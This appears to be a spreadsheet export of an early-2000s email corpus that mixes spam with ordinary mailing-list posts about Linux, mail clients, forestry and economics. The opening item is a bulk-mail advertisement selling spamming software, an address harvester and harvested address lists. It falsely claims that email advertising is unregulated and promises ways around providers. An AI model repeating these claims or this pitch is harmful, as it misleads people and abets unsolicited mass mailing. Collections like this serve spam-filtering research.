   responded to within the FIRST 48 HOURS!
 "When you reach people with e-mail, they're in a work mode, even
  if they're not at work.  They're sitting up, they're alert.  You
  catch them at a good moment, and if you do it right, you have a
  really good shot of having them respond."
  - WILLIAM THAMES [Revnet Direct Marketing VP]
 ---- --- -- -  -
 * An Arthur Anderson Online Panel reveals that 85% of Online Users
   say that Broadcast Email Advertisements have LED TO A PURCHASE!"
 "According to FloNetwork, US Consumers DISCOVER New Products and
  Services 7+ TIMES MORE OFTEN through an Email Advertisement,
  than through Search Engines, Magazines and Television COMBINED!"
 Only a HANDFUL of Companies on the Internet have Discovered
 Broadcast Email Advertising... =&gt; NOW YOU CAN BE ONE OF THEM!!
 ---- --- -- -  -
 =&gt; United Messaging says there are 890+ MILLION EMAIL ADDRESSES!
 =&gt; GET READY!  Now with Broadcast Email, You Can Reach them ALL
 =&gt; Thanks to our Broadcast Email Software!
 Our Broadcast Email Software with DNS Technology Automatically
 Creates 10 SUPER-FAST MAIL SERVERS on Your COMPUTER which are
 then used to Send out Your Broadcast Emails to MILLIONS for FREE!
 ==&gt; With our NEW EMAIL SENDING TECHNOLOGY... 
 ==&gt; Your Internet Provider's Mail Servers are NOT USED!
 There are NO Federal Regulations or Laws on Email Advertising &amp;
 Now with Our Software =&gt; You Can Avoid Internet Provider Concerns!
 ==================================================================
 =&gt; If you send a Broadcast Email Advertisement to 50,000,000
 =&gt; People and Just 1 of 5,000 People Respond, You Can Generate
 =&gt; 10,000 EXTRA ORDERS!  How Much EXTRA PROFIT is this for You?
 ==================================================================
 ------ ----- ---- --- -- -  -
 As Featured in: "The Boston Globe" (05/29/98),
 "The Press Democrat" (01/08/99), "Anvil Media" (01/29/98):
 ==================================================================
 [NIM Corporation Presents]: THE BROADCAST EMAIL PACKAGE
 ==================================================================
 REQUIREMENTS: WIN 95/98/2000/ME/NT/XP or MAC SoftWindows/VirtualPC
 =&gt; [BROADCAST EMAIL SENDER SOFTWARE] ($479.00 Retail):
     Our Broadcast Email Sender Software allows you the ability to
     send out Unlimited, Personalized and Targeted Broadcast Email 
     Advertisements to OVER 500,000,000 People on the Internet at
     the rate of up to 1,000,000 DAILY, AUTOMATICALLY and for FREE!
     Have a List of Your Customer Email Addresses?  Broadcast Email
     Advertise to Them with our Software for FREE!
 =&gt; [TARGETED EMAIL EXTRACTOR SOFTWARE] ($299.00 Retail):
     Our Targeted Email Extractor Software will Automatically
     Navigate through the TOP 8 Search Engines, 50,000+ Newsgroups,
     Millions of Web Sites, Deja News, Etc.. and Collect MILLIONS
     of Targeted Email Addresses by using the keywords of your
     choice!  This is the ULTIMATE EXTRACTOR TOOL!
 =&gt; [28,000,000+ EMAIL ADDRESSES] ($495.00 Retail):
     MILLIONS of the NEWEST &amp; FRESHEST General Interest and
     Regionally Targeted Email Addresses Separated by Area Code,
     State, Province, and Country!  From Alabama to Wyoming,
     Argentina to Zimbabwe!  28,000,000+ FRESH EMAILS are YOURS!
 =&gt; [STEP BY STEP BROADCAST EMAIL PACKAGE INSTRUCTIONS]:
     You will be Guided through the Entire Process of Installing
     and Using our Broadcast Email Software to Send out Broadcast
     Email Advertisements, like this one, to MILLIONS of PEOPLE for
     FREE!  Even if you have NEVER used a computer before, these
     instructions make sending Broadcast Email as EASY AS 1-2-3!
 =&gt; [THE BROADCAST EMAIL HANDBOOK]:
     The Broadcast Email Handbook will describe to you in detail,
     everything you ever wanted to know about Broadcast Email!
     Learn how to write a SUCCESSFUL Advertisement, how to manage
     the HUNDREDS of NEW ORDERS you could start receiving, what
     sells BEST via Broadcast Email, etc...  This Handbook is a
     NECESSITY for ANYONE involved in Broadcast Email!
 =&gt; [UNLIMITED CUSTOMER &amp; TECHNICAL SUPPORT]:
     If you ever have ANY questions, problems or concerns with
     ANYTHING related to Broadcast Email, we include UNLIMITED
     Customer &amp; Technical Support to assist you!  Our #1 GOAL
     is CUSTOMER SATISFACTION!
 =&gt; [ADDITIONAL INFORMATION]:
     Our Broadcast Email Software Package contains so many
     features, that it would take five additional pages just to
     list them all!  Duplicate Removing, Automatic Personalization,
     and Free Upgrades are just a few of the additional bonuses
     included with our Broadcast Email Software Package!
 ------ ----- ---- --- -- -  -
 =&gt; ALL TOGETHER our Broadcast Email Package contains EVERYTHING
    YOU WILL EVER NEED for Your Entire Broadcast Email Campaign!
 ** You Will Receive the ENTIRE Broadcast Email Package with
    EVERYTHING Listed Above ($1,250.00+ RETAIL) for ONLY $499.00!
 ==================================================================
 =&gt; BUT WAIT!!  If You Order by Monday, June 3rd, You Will
    Receive the ENTIRE Broadcast Email Package for ONLY $295.00!!
 ==================================================================
 Regardless, if you send to 1,000 or 100,000,000 PEOPLE...
 You will NEVER encounter any additional charges ever again!
 Our Broadcast Email Software sends Email for a LIFETIME for FREE!
 ----- ---- --- -- -  -
 Since 1997, we have been the Broadcast Email Marketing Authority.
 Our #1 GOAL is to SEE YOU SUCCEED with Broadcast Email Advertising.
 We are so confident about our Broadcast Email Package, that we are
 giving you 30 DAYS to USE OUR ENTIRE PACKAGE FOR FREE!
 ==&gt; You can SEND Unlimited Broadcast Email Advertisements!
 ==&gt; You can EXTRACT Unlimited Targeted Email Addresses!
 ==&gt; You can RECEIVE Unlimited Orders!
 If you do not receive at least a 300% INCREASE in SALES or are not
 100% COMPLETELY SATISFIED with each and every single aspect of our
 Broadcast Email Package, simply return it to us within 30 DAYS for
 a 100% FULL REFUND, NO QUESTIONS ASKED!!
 Best of ALL, if you decide to keep our Broadcast Email Package, it
 can be used as a 100% TAX WRITE OFF for your Business!
 ---- --- -- - -
 See what users of our Broadcast Email Package have to say...
 ==================================================================
 "Since using your program, I have made as much in two days as I
  had in the previous two weeks!!!!!  I have to say thank you for
  this program - you have turned a hobby into a serious money
  making concern."
  = W. ROGERS - Chicago, IL
 "We have used the software to send to all our members plus about
  100,000 off the disk you sent with the software and the response
  we have had is just FANTASTIC!!  Our visits and sales are nearly
  at an all time high!"
  = A. FREEMAN - England, UK
 "I have received over 1200 visitors today and that was only
  sending out to 10,000 email addresses!"
  = K. SWIFT - Gunnison, CO
 "I'm a happy customer of a few years now.  Thanks a lot....I love
  this program.."
  = S. GALLAGHER - Melville, NY
 "Thanks for your prompt filing of my order for your broadcast email
  software -- it took only about a day.  This is faster than ANYBODY
  I have ever ordered something from!  Thanks again!"
  = W. INGERSOLL - Scottsdale, AZ
 "I feel very good about referring the folks I have sent to you
  thus far and will continue to do so.  It is rare to find a company
  that does business this way anymore...it is greatly appreciated."
  = T. BLAKE - Phoenix, AZ
 "Your software is a wonderful tool! A++++"
  = S. NOVA - Los Angeles, CA
 "Thank you for providing such a fantastic product."
  = M. LOPEZ - Tucson, AZ
 "Your tech support is the best I have ever seen!"
  = G. GONZALEZ - Malibu, CA
 "I am truly impressed with the level of service.  I must admit I
  was a bit skeptical when reading your ad but you certainly deliver!"
  = I. BEAUDOIN - Toronto, ON
 "My first go round gave me $3000 to $4000 in business in less than
  one week so I must thank your company for getting me started."
  = A. ROBERTS - San Francisco, CA
 "We are really happy with your Email program.  It has increased
  our business by about 500%."
  = M. JONES - Vancouver, BC
 "IT REALLY WORKS!!!!!  Thank you thank you, thank you."
  = J. BECKLEY - Cupertino, CA
 ----- ---- --- -- -  -
 [SOUND TOO GOOD TO BE TRUE?]
 ** If you Broadcast Email to 500,000 Internet Users Daily...
 ** Do you think that maybe 1 of 5,000 may order?
 =&gt; If so... That is 100 EXTRA (COST-FREE) ORDERS EVERY DAY!!
 Remember.. You have 30 DAYS to use our Broadcast Email Package
 for FREE and SEE IF IT WORKS FOR YOU!
 If YOU are not 100% COMPLETELY SATISFIED, SIMPLY RETURN the
 Broadcast Email Package to us within 30 DAYS for a FULL REFUND!
 --- -- -  -
 [BROADCAST EMAIL SOFTWARE PACKAGE]: Easy Ordering Instructions
 ==================================================================
 =&gt; Once your order is received we will IMMEDIATELY RUSH out the
 =&gt; Broadcast Email Package on CD-ROM to you via FEDEX PRIORITY
 =&gt; OVERNIGHT or 2-DAY PRIORITY INTERNATIONAL the SAME DAY =&gt; FREE!
 ------- ------ ----- ---- --- -- -  -
 [TO ORDER BY PHONE]:
 To order our Broadcast Email Software Package by phone with
 a Credit Card or if you have any additional questions, please 
 call our Sales Department M-F from 8am to 5pm PST at:
 =&gt; (541)665-0400
 ** YOU CAN ORDER NOW!  ALL Major Credit Cards are Accepted!
 ORDER by 3PM PST (M-TH) TODAY -&gt; Have it by 10am TOMORROW -&gt; FREE!
 EUROPEAN &amp; FOREIGN Residents -&gt; Have it within 2 WEEKDAYS -&gt; FREE!
 REMOVAL From Our Email List =&gt; (206)208-4589
 ------- ------ ----- ---- --- -- -  -
 [TO ORDER BY FAX]:
 To order our Broadcast Email Software Package by fax with a Credit
 Card, please print out the order form at the bottom of this email
 and complete all necessary blanks.  Then, fax the completed order
 form to:
 =&gt; (503)213-6416
 ------- ------ ----- ---- --- -- -  -
 [TO ORDER BY POSTAL MAIL]:
 To order our Broadcast Email Software Package with a Cashiers
 Check, Credit Card, US Money Order, US Personal Check, or US Bank
 Draft by postal mail, please print out the order form at the
 bottom of this email and complete all necessary blanks.
 Then, send it along with payment of $295.00 US postmarked by
 Monday, June 3rd, or $499.00 US after Monday, June 3rd to:
 NIM Corporation
 1314-B Center Drive #514
 Medford, OR 97501
 United States of America
 ----- ---- --- -- -  -
 "OVER 20,000 BUSINESSES come on the Internet EVERY single day...
 If you don't send out Broadcast Email... YOUR COMPETITION WILL!"
 ------- ------ ----- ---- --- -- -  -
 [Broadcast Email Software Package]: ORDER FORM
 (c)1997-2002 NIM Corporation.  All Rights Reserved
 ==================================================================
 Company Name: ____________________________________________________
 Your Name: _______________________________________________________
 BILLING ADDRESS: _________________________________________________
 City: ________________________ State/Province: ___________________
 Zip/Postal Code: _______________ Country: ________________________
 NON POBOX SHIPPING ADDRESS: ______________________________________
 City: ________________________ State/Province: ___________________
 Zip/Postal Code: _______________ Country: ________________________
 Phone Number: ___________________ Fax Number: ____________________
 Email Address: ___________________________________________________
 ** To Purchase by Credit Card, Please Complete the Following:
 Visa [ ]  Mastercard [ ]  AmEx [ ]  Discover [ ]  Diners Club [ ]
 Name on Credit Card: _____________________________________________
 CC Number: _________________________________ Exp. Date: __________
 Amount to Charge Credit Card ($295.00 or $499.00):  ______________
 Signature: _______________________________________________________
 ==================================================================
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: V2.4 keeps incorrectly blue-ing folders
</t>
  </si>
  <si>
    <t xml:space="preserve">--==_Exmh_-882253667P
 Content-Type: text/plain; charset=us-ascii
 &gt; From:  Harlan Feinstein &lt;harlan@feinsteins.net&gt;
 &gt; Date:  Sat, 17 Aug 2002 19:40:21 -0400
 &gt;
 &gt; Exmh keeps turning the folder indicator blue for one folder, and I've read 
 &gt; all the messages in the folder.  Driving me nuts.  I've packed the folder, 
 &gt; I've deleted the .mh_sequences file there, keeps doing it.  Help!  
 &gt; 
 &gt; I've just recently started using 2.4 (was using 2.2), so perhaps there are 
 &gt; things that needed to be deleted/changed in my settings?
 2.4?
 2.5 has been out for over a year.
 I can't think of anything with those symptoms in 2.4, but why don't you try 
 the upgrade and see if you still have the problem.
 Chris
 -- 
 Chris Garrigues                 http://www.DeepEddy.Com/~cwg/
 virCIO                          http://www.virCIO.Com
 716 Congress, Suite 200
 Austin, TX  78701		+1 512 374 0500
   World War III:  The Wrong-Doers Vs. the Evil-Doers.
 --==_Exmh_-882253667P
 Content-Type: application/pgp-signature
 -----BEGIN PGP SIGNATURE-----
 Version: GnuPG v1.0.6 (GNU/Linux)
 Comment: Exmh version 2.2_20000822 06/23/2000
 iD8DBQE9Xup/K9b4h5R0IUIRAgvAAJ9y5U/x3/bIv3J1ZIvg68MveMoMWACfcRbJ
 rzUKLzFVnLfNIVg3qKRgGhw=
 =mlhE
 -----END PGP SIGNATURE-----
 --==_Exmh_-882253667P--
 _______________________________________________
 Exmh-users mailing list
 Exmh-users@redhat.com
 https://listman.redhat.com/mailman/listinfo/exmh-users
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: RE: [ILUG] Installing lilo on another disk.
</t>
  </si>
  <si>
    <t xml:space="preserve">&gt; I thought perhaps I should just do   lilo -b /dev/hdb -r /mnt  but I think
 &gt; that -b is analogous to the boot keyword in lilo.conf. Or will this just
 &gt; work automagically ?  i.e. boot = /dev/hda tells lilo what numbers to poke
 &gt; where, and it figures out where the disk is from the -r ?
 That won't work like you want.  You'll end up with a boot loader
 on the backup disk that contains the 'physical' location of
 the /boot/map file on the main disk.  That won't necessarily
 be the same as the backup disk.
 I can't think of a right way to do his with LILO.  I've got
 a similar seup on my home machine (rsync to a backup disk
 every night), but I'll be pulling out the RH install CDs to
 get LILO sorted if I have to do a disk swap.
 GRUB should be able to handle this no problem, since it
 doesn't record sector numbers like LILO does.  Not much help
 for you though...
 Later,
 Kenn
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Matthias,
 On Mon, Sep 30, 2002 at 09:28:26AM +0200, Matthias Saou wrote:
 &gt; All freshrpms.net is now set for the imminent release of Red Hat Linux 8.0.
 thanks a lot for all your effords! It is just great!
 &gt; I'll probably post to the list once I open up ftp.freshrpms.net so you can
 &gt; be the first ones to get in and download, although I doubt you'll have
 &gt; trouble finding access to at least one fast mirror using my mirror list.
 You mean the mirror list for RH8.0, or do there exist mirrors for your apt
 repo?
 On Sat, Sep 28, 2002 at 06:37:54PM +0200, Matthias Saou wrote: 
 &gt; I'll keep you all posted on Monday! They'll even be a big apt-related 
 &gt; surprise! ;-)))) 
 Was this the surprise, or will there be even more (where are my heart pills)? ;)
 Thanks Matthias!
 -- 
 Axel.Thimm@physik.fu-berlin.de
 _______________________________________________
 RPM-List mailing list &lt;RPM-List@freshrpms.net&gt;
 http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: RE: [ILUG] Sparc Solaris (was: Dell GX260 V Redhat 7.3)
</t>
  </si>
  <si>
    <t xml:space="preserve">Hi Damian.
 SuSe has a Sparc version I previously been running on a Sun Ultra 5 at 
 least. Worked fine, albeit a bit slow... ;)
 //Anders
 At 14:32 09/08/2002, Damian O' Sullivan wrote:
 &gt;I use gnome here on half a dozen sunray 150 boxen. Been trying to get linux
 &gt;on them for along time with mixed results.. Has anyone succeeded in this?
 &gt;
 &gt; &gt; -&gt; It does work on SunRays. Just install it normally on the
 &gt; &gt; server, the sun
 &gt; &gt; install will make the necessary changes to the dtlogin screen
 &gt; &gt; and you can just
 &gt; &gt; select gnome from there. AFAIK you can do this for any window
 &gt; &gt; manager. But I
 &gt; &gt; don't admin sunray servers so I'm not fully aware of the
 &gt; &gt; issues or exact
 &gt; &gt; requirements.
 &gt; &gt;
 &gt; &gt; Cheers,
 &gt; &gt; ~Al
 &gt; &gt;
 &gt;
 &gt;
 &gt;--
 &gt;Irish Linux Users' Group: ilug@linux.ie
 &gt;http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 &gt;List maintainer: listmaster@linux.ie
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">
 Hello ~name~,
 If you ordered a flat-rate domestic calling product or a 20 minute free trial using a local access number, your service will be operating in about 24-48 hours or on your designated trial date and time.  Please try dialing the access number you found on your reseller's web page at:
 http://www.internationalfreecall.com
 If you ordered a flat-rate domestic calling product using a 1-800 toll-free access number, your service will be operating within 1-2 work days.
 Please try dialing 1-866-865-4548.
 In either case, when your service is switched on, you will hear a voice ask you to dial the number you are calling.
 You must dial 1+area code+7 digit number followed by # to make any calls: local or long distance.
 Example - To call www.internationalfreecall.com, you would dial the following after dialing your access number and listening for the voice:
 1-410-608-8178# 
 Please use this service for all your calling and you will never pay more than your monthly fee again. There are no taxes or surcharges, so dial away!
 Finally, I recommend entering the access number into your speed dial settings on your telephone.  This will make your service quicker and easier to use, and thus more enjoyable.
 If you have any questions, please contact us for more information.
 In addition, if you need product enhancements like 3-way calling, portable calling cards, international calling products, or marketing tools, please visit:
 http://www.internationalfreecall.com
 In the meantime, the other network on this free calling promotion is OPEX, which is offering 100 minutes of free long distance for trying their program.  
 Opex's usual rates are 4.5 cents per minute for domestic calls, with great international rates, too!
 For more information on OPEX, or to sign up, please click below:
 http://cognigen.net/opex/main.cgi?lietuva
 To unsubscribe from this mailing list, please click on:
 http://www.internationalfreecall.com/cgi-bin/aefs/subscribe.cgi?user=info&amp;listid=3.list&amp;id=5576
</t>
  </si>
  <si>
    <t xml:space="preserve">Okay, I'll ammend that to LIVE OLD tree saving, like the thousands of 
 acres of virgin pine forest that was razed here in MS so that our military 
 can practice desert warfare?  Fought it for years, lost, now there is a 
 stand of trees up and down Hwy 49 that's supposed to try to hide the fact 
 that a huge portion of the Desoto Ntl. Forest is gone.
 C
 On Wed, 31 Jul 2002, Marty Halvorson wrote:
 &gt;  &gt; So my thanks to those who are active in:
 &gt;  &gt; tree saving (okay, I help some here, but never enough)
 &gt;  &gt; drug rehabilitation (-smirk-  shut up, I'm serious)
 &gt;  &gt; keeping some of our freedoms intact (see tree saving)
 &gt;  &gt; health care reform
 &gt;  &gt; puppy dog rescue
 &gt;  &gt; education (move this one to the top of the list)
 &gt;  &gt; etc (lots and lots of etc)
 &gt; 
 &gt; I can agree with most of this list except tree saving.
 &gt; 
 &gt; Please understand, I'm in favor of forests.  I'm not in favor of messing 
 &gt; with natural processes that forests and trees have evolved over millions of 
 &gt; years.
 &gt; 
 &gt; Every time I look toward the west from my house I see the result of overly 
 &gt; aggressive tree saving.  The Cerro Grande fire that destroyed many (200+) 
 &gt; houses and an area bigger than Boston.
 &gt; 
 &gt; The Santa Fe watershed, which has as many as 1200 trees per acre in an area 
 &gt; that if left to nature would have 30-60 trees per acre.  When the Forest 
 &gt; Service attempted to cull trees in their part of the watershed, the tree 
 &gt; lovers stopped the program with law suits.
 &gt; 
 &gt; A number of other projects have been stopped by similar suits.  For 
 &gt; example, a fire south of Los Alamos that left many usable, but partially 
 &gt; burned, trees standing.  The Forest Service started a project to allow 
 &gt; loggers to take those trees.  Hah!  The tree lovers stopped that.  Can't 
 &gt; have the loggers go into the forest even if the trees being taken are 
 &gt; already burned and the roads necessary to get to the trees are already built.
 &gt; 
 &gt; A Forest Service official has stated flat out that the tree lovers need to 
 &gt; understand their responsibility in contributing to the number of 
 &gt; uncontrollable (i.e., crown fires caused by very dense tree stands and 
 &gt; under growth) fires by their suits to stop any tree removal from the 
 &gt; forests managed by the Forest Service.
 &gt; 
 &gt; I am writing having survived another season of forest fires.  One that saw 
 &gt; many more fires than normal because of the severe drought occurring here in 
 &gt; the Southwest (even though there are still quite a few fires burning).
 &gt; 
 &gt; Peace,
 &gt; 
 &gt; Marty Halvorson
 &gt; marty@halvorson.us
 &gt; 
 &gt; http://xent.com/mailman/listinfo/fork
 &gt; 
 -- 
 "My theology, briefly, is that the universe was dictated but not
           signed."  (Christopher Morley) 
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">more accurately: someone's dream changes reality for everyone, and
 everyone's memory adjusts to perceive the new realities as a continuum,
 replete with new pasts and new memories.
 ever have dreams that "create" their own history to make their irrealities
 plausible and authentic feeling?
 ever notice how the feelings evoked in some dreams stick with you all day?
 i'm sure it's some neurochemical process initiated during the dream that is
 still cycling thru - like a deja vu, triggered by memory processes, where
 you don't actually remember but you feel like you're remembering.
 ggggggggg
 -----Original Message-----
 From: fork-admin@xent.com [mailto:fork-admin@xent.com]On Behalf Of John
 Hall
 Sent: Monday, September 09, 2002 2:03 PM
 To: FoRK
 Subject: RE: Recommended Viewing
 Isn't this the story where someone's "Dream" has the ability to change
 reality -- then you find the whole world is their dream?
 &gt; -----Original Message-----
 &gt; From: fork-admin@xent.com [mailto:fork-admin@xent.com] On Behalf Of
 Geege
 &gt; Schuman
 &gt; Sent: Monday, September 09, 2002 4:26 AM
 &gt; To: John Evdemon
 &gt; Cc: fork@spamassassin.taint.org
 &gt; Subject: RE: Recommended Viewing
 &gt;
 &gt; Agreed, completely.  I totally grokked the notion of unintened
 consequence
 &gt; with the original.
 &gt;
 &gt; -----Original Message-----
 &gt; From: fork-admin@xent.com [mailto:fork-admin@xent.com]On Behalf Of
 John
 &gt; Evdemon
 &gt; Sent: Monday, September 09, 2002 7:03 AM
 &gt; To: Fork@xent.com
 &gt; Subject: Re: Recommended Viewing
 &gt;
 &gt;
 &gt; On 8 Sep 2002 at 22:15, Geege Schuman wrote:
 &gt;
 &gt; &gt; who watched Lathe of Heaven?  (A&amp;E, 8 pm EDT)  who has seen
 &gt; &gt; the original?
 &gt; &gt;
 &gt; By "original" if you are referring to the old PBS version, I liked
 that
 &gt; version much better.  Much more thought provoking.
 &gt;
 &gt;
 &gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Anyone who doesn't appreciate both PLUCK and LUCK is only looking at
 part of the equation.
 America has, in fact, moved hard toward Meritocracy.  But -- and this is
 a huge one -- you don't necessarily find it on the Forbes list.  There
 is an element of LUCK, even if only being in the right place at the
 right time, to go that high.
 Beyond the Forbes List, there are many ways in which almost pure LUCK is
 involved in significant wealth.  Being a super-model, for example.
 Though I think most people would be surprised by a lot of super-models.
 Cindy Crawford was valedictorian of her high school.
 Most people, of course, aren't in those stratified realms.  It is the
 rest of us who tend to sort.
 There is a huge philosophical problem with the concept of Merit in the
 first place.  Rawls claims Merit doesn't exist.  Sowell seems to agree
 at least in part, but I'm sure Sowell would also state that the benefits
 of pretending it exists for society at large are enormous.
 And if Merit does exist then exactly what is it measuring?  IQ?  Purity
 of heart?  Or the ability to satisfy customers?  Functionally most
 people seem to equate Merit with IQ though they say it would be better
 if it were purity of heart.  Yet the type of Merit that lands you on the
 Forbes list, or even just being a garden variety 'millionaire next door'
 is more likely to be the 'serving customers' definition.
 Differences due to merit, when they are perceived as such, generate far
 more animosity than differences due to luck.  Luck can be forgiven.
 Superior performance, often not.
 &gt; -----Original Message-----
 &gt; From: fork-admin@xent.com [mailto:fork-admin@xent.com] On Behalf Of
 Geege
 &gt; Schuman
 &gt; Sent: Monday, September 23, 2002 4:44 PM
 &gt; To: R. A. Hettinga; Geege Schuman; Owen Byrne
 &gt; Cc: Gary Lawrence Murphy; Mr. FoRK; fork@example.com; Digital Bearer
 &gt; Settlement List
 &gt; Subject: RE: Comrade Communism (was Re: Crony Capitalism (was RE: sed
 &gt; /s/United States/Roman Empire/g))
 &gt; 
 &gt; First, misattribution.  I did not write the blurb below.  I made one
 &gt; statement about VP Cheney only, to wit, that he has a short memory.
 &gt; 
 &gt; I couldn't agree with you more on this: "in short, then, economics is
 not
 &gt; a
 &gt; zero sum game, property is not theft, the rich don't get rich off the
 &gt; backs
 &gt; of the poor, and redistributionist labor "theory" of value happy
 horseshit
 &gt; is just that: horseshit, happy or otherwise," however, I resent being
 &gt; lumped
 &gt; in a zero-sum-zealot category for suggesting nothing more than that
 rich
 &gt; and
 &gt; successful at face value is apropos of nothing and I am beginning to
 &gt; understand that people who immediately and so fiercely object to my ad
 &gt; hominem (re Cheney) align themselves weird sylogisms like "if rich
 then
 &gt; deservedly" or "if rich then smarter."  Given that, I am also
 beginning to
 &gt; understand why some people NEED to be rich.
 &gt; 
 &gt; WRT to meritocracies - all hail, meritocracies!  WRT Harvard: over 90%
 of
 &gt; 2002 graduates were cum laude +. INTERESTING curve.  Those eager to be
 &gt; measured got their wish; those unwashed shy folk who just live it
 provide
 &gt; the balast.
 &gt; 
 &gt; Speaking of Forbes, was reading about Peter Norton just today in an
 old
 &gt; issue while waiting for my doctor.  Norton attributes his success to
 LUCK.
 &gt; Imagine.
 &gt; 
 &gt; Geege
 &gt; 
 &gt; -----Original Message-----
 &gt; From: R. A. Hettinga [mailto:rah@shipwright.com]
 &gt; Sent: Sunday, September 22, 2002 10:01 PM
 &gt; To: Geege Schuman; Owen Byrne
 &gt; Cc: Gary Lawrence Murphy; Mr. FoRK; fork@example.com; Digital Bearer
 &gt; Settlement List
 &gt; Subject: Comrade Communism (was Re: Crony Capitalism (was RE: sed
 &gt; /s/United States/Roman Empire/g))
 &gt; 
 &gt; 
 &gt; -----BEGIN PGP SIGNED MESSAGE-----
 &gt; Hash: SHA1
 &gt; 
 &gt; At 11:15 AM -0400 on 9/22/02, Geege Schuman wrote:
 &gt; 
 &gt; 
 &gt; &gt; Most of them seem to have Ivy League educations, or are Ivy League
 &gt; &gt; dropouts suggesting to me that they weren't exactly poor to start
 &gt; &gt; with.
 &gt; 
 &gt; Actually, if I remember correctly from discussion of the list's
 &gt; composition in Forbes about five or six years ago, the *best* way to
 &gt; get on the Forbes 400 is to have *no* college at all. Can you say
 &gt; "Bootstraps", boys and girls? I knew you could...
 &gt; 
 &gt; [Given that an undergraduate liberal arts degree from a state school,
 &gt; like, say, mine, :-), is nothing but stuff they should have taught
 &gt; you in a government-run "high" school, you'll probably get more of
 &gt; *those* on the Forbes 400 as well as time goes on. If we ever get
 &gt; around to having a good old fashioned government-collapsing
 &gt; transfer-payment depression (an economic version of this summer's
 &gt; government-forest conflagration, caused by the same kind of
 &gt; innumeracy that not clear-cutting enough forests did out west this
 &gt; summer :-)) that should motivate more than a few erst-slackers out
 &gt; there, including me, :-), to learn to actually feed themselves.]
 &gt; 
 &gt; 
 &gt; The *next* category on the Forbes 400 list is someone with a
 &gt; "terminal" professional degree, like an MBA, PhD, MD, etc., from the
 &gt; best school possible.
 &gt; 
 &gt; Why? Because, as of about 1950, the *best* way to get into Harvard,
 &gt; for instance, is to be *smart*, not rich. Don't take my word for it,
 &gt; ask their admissions office. Look at the admissions stats over the
 &gt; years for proof.
 &gt; 
 &gt; Meritocracy, American Style, was *invented* at the Ivy League after
 &gt; World War II. Even Stanford got the hint, :-), and, of course,
 &gt; Chicago taught them all how, right? :-). Practically *nobody* who
 &gt; goes to a top-20 American institution of higher learning can actually
 &gt; afford to go there these days. Unless, of course, their parents, who
 &gt; couldn't afford to go there themselves, got terminal degrees in the
 &gt; last 40 years or so. And their kids *still* had to get the grades,
 &gt; and "biased" (by intelligence :-)), test scores, to get in.
 &gt; 
 &gt; 
 &gt; The bizarre irony is that almost all of those people with "terminal"
 &gt; degrees, until they actually *own* something and *hire* people, or
 &gt; learn to *make* something for a living all day on a profit and loss
 &gt; basis, persist in the practically insane belief, like life after
 &gt; death, that economics is some kind of zero sum game, that dumb people
 &gt; who don't work hard for it make all the money, and, if someone *is*
 &gt; smart, works hard, and is rich, then they stole their wealth somehow.
 &gt; 
 &gt; BTW, none of you guys out there holding the short end of this
 &gt; rhetorical stick can blame *me* for the fact that I'm using it to
 &gt; beat you severely all over your collective head and shoulders. You
 &gt; were, apparently, too dumb to grab the right end. *I* went to
 &gt; Missouri, and *I* don't have a degree in anything actually useful,
 &gt; much less a "terminal" one, which means *I*'m broker than anyone on
 &gt; this list -- it's just that *you*, of all people, lots with
 &gt; educations far surpassing my own, should just plain know better. The
 &gt; facts speak for themselves, if you just open your eyes and *look*.
 &gt; There are no epicycles, the universe does not orbit the earth, and
 &gt; economics is not a zero-sum game. The cost of anything, including
 &gt; ignorance and destitution, is the forgone alternative, in this case,
 &gt; intelligence and effort.
 &gt; 
 &gt; [I will, however, admit to being educated *waay* past my level of
 &gt; competence, and, by the way *you* discuss economics, so have you,
 &gt; apparently.]
 &gt; 
 &gt; 
 &gt; 
 &gt; BTW, if we ever actually *had* free markets in this country,
 &gt; *including* the abolition of redistributive income and death taxes,
 &gt; all those smart people in the Forbes 400 would have *more* money, and
 &gt; there would be *more* self-made people on that list. In addition,
 &gt; most of the people who *inherited* money on the list would have
 &gt; *much* less of it, not even relatively speaking. Finally, practically
 &gt; all of that "new" money would have come from economic efficiency and
 &gt; not "stolen" from someone else, investment bubbles or not.
 &gt; 
 &gt; That efficiency is called "progress", for those of you in The
 &gt; People's Republics of Berkeley or Cambridge. It means more and better
 &gt; stuff, cheaper, over time -- a terrible, petit-bourgeois concept
 &gt; apparently not worthy of teaching by the educational elite, or you'd
 &gt; know about it by now. In economic terms, it's also called an increase
 &gt; in general welfare, and, no, Virginia, I'm not talking about
 &gt; extorting money from someone who works, and giving it to someone who
 &gt; doesn't in order to keep them from working and they can think of some
 &gt; politician as Santa Claus come election time...
 &gt; 
 &gt; 
 &gt; In short, then, economics is not a zero sum game, property is not
 &gt; theft, the rich don't get rich off the backs of the poor, and
 &gt; redistributionist labor "theory" of value happy horseshit is just
 &gt; that: horseshit, happy or otherwise.
 &gt; 
 &gt; To believe otherwise, is -- quite literally, given the time Marx
 &gt; wrote Capital and the Manifesto -- romantic nonsense.
 &gt; 
 &gt; Cheers,
 &gt; RAH
 &gt; 
 &gt; -----BEGIN PGP SIGNATURE-----
 &gt; Version: PGP 7.5
 &gt; 
 &gt; iQA/AwUBPY511cPxH8jf3ohaEQLAsgCfZhsQMSvUy6GqJ5wgL52DwZKpIhMAnRuR
 &gt; YYboc+IcylP5TlKL58jpwEfu
 &gt; =z877
 &gt; -----END PGP SIGNATURE-----
 &gt; 
 &gt; --
 &gt; -----------------
 &gt; R. A. Hettinga &lt;mailto: rah@ibuc.com&gt;
 &gt; The Internet Bearer Underwriting Corporation &lt;http://www.ibuc.com/&gt;
 &gt; 44 Farquhar Street, Boston, MA 02131 USA
 &gt; "... however it may deserve respect for its usefulness and antiquity,
 &gt; [predicting the end of the world] has not been found agreeable to
 &gt; experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'
 &gt; 
 &gt; 
</t>
  </si>
  <si>
